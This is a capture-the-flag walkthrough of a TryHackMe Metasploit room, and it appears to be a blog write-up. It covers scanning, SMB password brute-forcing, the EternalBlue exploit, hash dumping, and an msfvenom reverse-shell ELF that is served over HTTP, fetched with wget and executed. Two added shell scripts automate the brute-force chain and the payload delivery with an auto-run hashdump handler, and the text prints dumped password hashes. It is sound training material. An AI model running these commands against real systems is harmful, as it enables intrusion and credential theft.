Hello friend,
this write-up is for the second Metasploit walkthrough room on TryHackMe. Let’s take a look. This room is more hands-on than the last one and lets you practice how to use Metasploit.
Task 2 – Scanning
How many ports are open on the target system?
For this, you can either use one of the portscan modules of Metasploit, or any other port scanner like nmap. First, I tried the portscan/syn module, which gave me a permission error. So I just used nmap, but I also tried it with higher privileges. After restarting Metasploit with sudo permissions… it found nothing. Then I tried the portscan/tcp module, which gave me results but took way longer than nmap.
So yeah, the answer is 5.
Using the relevant scanner, what NetBIOS name can you see?
Okay, after running the command search netbios we see a scanner/netbios/nbname module, which looks promising.
I take a look at the options and think, "the target port is set to 137, but we found NetBIOS on 139, let's change that…" Well, my first scan wasn't successful. NetBIOS uses UDP port 137 for name resolution, and the module options even say UDP. Port 139, which we found, is the TCP port used for the NetBIOS session service. After changing it back to 137 and running it again, we find the name.
What is running on port 8000?
One option is to run a more in-depth scan with nmap, which I did.
Another option would be the http_version module of Metasploit:
What is the “penny” user’s SMB password? Use the wordlist mentioned in the previous task.
Okay, for this task we should use the smb_login module to brute-force the login. Let’s do that. First, we have to configure our wordlist and the user name.
Since I use my own VM, I downloaded the wordlist earlier. If you use the AttackBox, the path for the wordlist is /usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt
And after a few seconds, the password is found:
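The whole Task 2 chain can be driven from one Metasploit resource script instead of setting options module by module. The script below is an added example, not part of the room or of this write-up: it writes a task2.rc that runs the TCP connect scanner (no raw sockets needed, unlike portscan/syn), the NetBIOS name query on UDP/137, the HTTP banner grab on 8000 and the smb_login dictionary attack for the penny user, and it refuses to build the script for anything that is not a plausible IPv4 address. The target IP is a placeholder and the wordlist path is the AttackBox one mentioned above.

```shell
#!/bin/sh
# Added example (not from the TryHackMe room or the original write-up):
# generate a Metasploit resource script for the Task 2 scan chain.
# Assumptions: the target IP passed on the command line is a placeholder;
# the wordlist default is the AttackBox path named in the write-up.
set -eu

# Print the resource script for one target to stdout, so it can be
# inspected before being fed to msfconsole -r.
scan_rc() {
    rhost=$1
    wordlist=${2:-/usr/share/wordlists/MetasploitRoom/MetasploitWordlist.txt}
    cat <<EOF
# 1. TCP connect scan: works without root, unlike portscan/syn
use auxiliary/scanner/portscan/tcp
set RHOSTS ${rhost}
set PORTS 1-10000
set THREADS 10
run
# 2. NetBIOS name query goes to UDP/137 (the module default), not TCP/139
use auxiliary/scanner/netbios/nbname
set RHOSTS ${rhost}
set RPORT 137
run
# 3. Banner of whatever answers on 8000
use auxiliary/scanner/http/http_version
set RHOSTS ${rhost}
set RPORT 8000
run
# 4. Dictionary attack against a single SMB user, stop at the first hit
use auxiliary/scanner/smb/smb_login
set RHOSTS ${rhost}
set SMBUser penny
set PASS_FILE ${wordlist}
set STOP_ON_SUCCESS true
run
EOF
}

# Return 0 only for a dotted-quad IPv4 address with every octet in 0..255,
# so a typo does not end up as RHOSTS against the wrong box.
valid_ipv4() {
    oldifs=$IFS
    IFS=.
    set -- $1
    IFS=$oldifs
    [ $# -eq 4 ] || return 1
    for n in "$@"; do
        case $n in ''|*[!0-9]*) return 1 ;; esac
        [ "$n" -le 255 ] || return 1
    done
    return 0
}

main() {
    target=${1:-}
    valid_ipv4 "$target" || { echo "usage: $0 <target-ipv4>" >&2; exit 2; }
    scan_rc "$target" > task2.rc
    echo "[*] wrote task2.rc; run it with: msfconsole -q -r task2.rc"
}

# Only write the file when a target is given; otherwise just define the functions.
if [ $# -gt 0 ]; then
    main "$@"
fi
```

Run it as `sh task2.sh 10.10.33.51` (placeholder address) and then `msfconsole -q -r task2.rc`; each module keeps its own RHOSTS line so the script stays correct if you later reorder the steps.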
Task 3 – Metasploit Database
Metasploit can use a database to save and reuse your findings. There are no questions for this task, but a lot of examples on how to use the database features.
Task 4 – Vulnerability Scanning
Who wrote the module that allows us to check SMTP servers for open relay?
We search for the module and check the info.
Task 5 – Exploitation
Now let’s get to the actual exploitation part!
Exploit one of the critical vulnerabilities on the target VM
Well, not a lot to go on here. First, let’s scan the target.
After that a more in-depth scan of the individual ports:
We can see that it is a Windows 7 machine running SMB on port 445, so it might be vulnerable to EternalBlue (MS17-010), which is the exploit example in the task description. There is a scanner module to confirm that too.
You can find both the scanner and the exploit with search eternal
The exploit uses a meterpreter reverse_tcp payload by default, which is fine. We just have to set RHOSTS to the target's IP address and LHOST to our own IP address, then run it.
I forgot to set my LHOST IP on my first try, and the exploit wasn’t working anymore, so I restarted the target machine. After the reboot, it worked.
Here we are, our meterpreter shell.
What is the content of the flag.txt file?
To get a list of all meterpreter commands, use the help command, which shows us that there is a search command.
We can also use the usual Linux commands to navigate the file system.
What is the NTLM hash of the password of the user “pirate”?
We can use hashdump to get the contents of the SAM database, which stores the local user password hashes in Windows.
Each line has the form user:RID:LM hash:NTLM hash:::, so the last part is the NTLM hash:
8ce9a3ebd1647fcc5e04025019f4b875
Task 6 – Msfvenom
Launch the VM attached to this task. The username is murphy, and the password is 1q2w3e4r. You can connect via SSH or launch this machine in the browser. Once on the terminal, type “sudo su” to get a root shell, this will make things easier.
Okay.
Create a meterpreter payload in the .elf format (on the AttackBox, or your attacking machine of choice).
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP of your attacking machine> LPORT=4444 -f elf > shell.elf
Transfer it to the target machine (you can start a Python web server on your attacking machine with the python3 -m http.server 9000 command and use wget http://ATTACKING_10.10.33.51:9000/shell.elf to download it to the target machine).
On your machine, use python3 -m http.server 9000 as described.
And on the target machine: wget http://<your machine's IP>:9000/shell.elf
Get a meterpreter session on the target machine.
Now we need to start Metasploit with msfconsole
and create a listener.
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST <your attacker ip>
run
After that is done, switch back to the victim machine and adjust the permissions on the file so you can execute it, with chmod +x shell.elf
and then execute it with ./shell.elf
Use a post exploitation module to dump hashes of other users on the system.
The normal hashdump command from before is intended for Windows machines. On Linux, we have to use a post module instead. This can be done from within your meterpreter session with the command run post/linux/gather/hashdump
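The Task 6 steps above fit into a single script on the attacking side. The script below is an added example, not code from the room or the write-up: it builds the ELF with msfvenom, checks that the output really carries the ELF magic bytes, prints its SHA-256 so the copy on the target can be compared after the wget, serves the file over HTTP, and starts the handler with the Linux hashdump post module set to run automatically once the session arrives. LHOST, LPORT and the web port are placeholders; msfvenom and msfconsole are only needed when the script is actually told to run, the helper functions work without them.

```shell
#!/bin/sh
# Added example (not from the TryHackMe room or the original write-up):
# the Task 6 attacker-side workflow in one script.
# Assumptions: LHOST/LPORT/WEBPORT are placeholders to override via the
# environment; msfvenom, msfconsole and python3 are on PATH when "run" is given.
set -eu

LHOST=${LHOST:-10.10.33.51}   # attacker IP, placeholder
LPORT=${LPORT:-4444}
WEBPORT=${WEBPORT:-9000}
OUT=${OUT:-shell.elf}

# True when the file starts with the 4-byte ELF magic 7f 45 4c 46 ("\x7fELF").
is_elf() {
    [ "$(head -c 4 "$1" | od -An -tx1 | tr -d ' \n')" = "7f454c46" ]
}

# Hex SHA-256 of a file; compare with sha256sum on the target after the wget.
sha256_of() {
    sha256sum "$1" | cut -d' ' -f1
}

# The msfconsole command line for the handler. AutoRunScript runs the post
# module as soon as the meterpreter session is established.
handler_cmd() {
    printf '%s' "use exploit/multi/handler; set payload linux/x86/meterpreter/reverse_tcp; set LHOST $1; set LPORT $2; set AutoRunScript post/linux/gather/hashdump; exploit -j"
}

build_payload() {
    msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="$LHOST" LPORT="$LPORT" -f elf -o "$OUT"
    is_elf "$OUT" || { echo "[!] $OUT is not an ELF file; msfvenom output is unusable" >&2; exit 1; }
    echo "[*] $OUT sha256: $(sha256_of "$OUT")"
}

main() {
    build_payload
    python3 -m http.server "$WEBPORT" >/dev/null 2>&1 &
    webpid=$!
    echo "[*] on the target run: wget http://$LHOST:$WEBPORT/$OUT && sha256sum $OUT && chmod +x $OUT && ./$OUT"
    # Blocks until you leave msfconsole; the hashdump output appears in the session log.
    msfconsole -q -x "$(handler_cmd "$LHOST" "$LPORT")"
    kill "$webpid"
}

if [ "${1:-}" = "run" ]; then
    main
fi
```

Invoke it as `LHOST=<your attacker ip> sh task6.sh run`; the ELF check catches the common failure where msfvenom writes an error message instead of a binary, and the SHA-256 line gives you something to compare against on the target before you chmod and execute it.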
What is the other user’s password hash?
Since we logged in as murphy, the other user is claire
And her password hash is:
$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0
That was the second room about Metasploit, one more to go.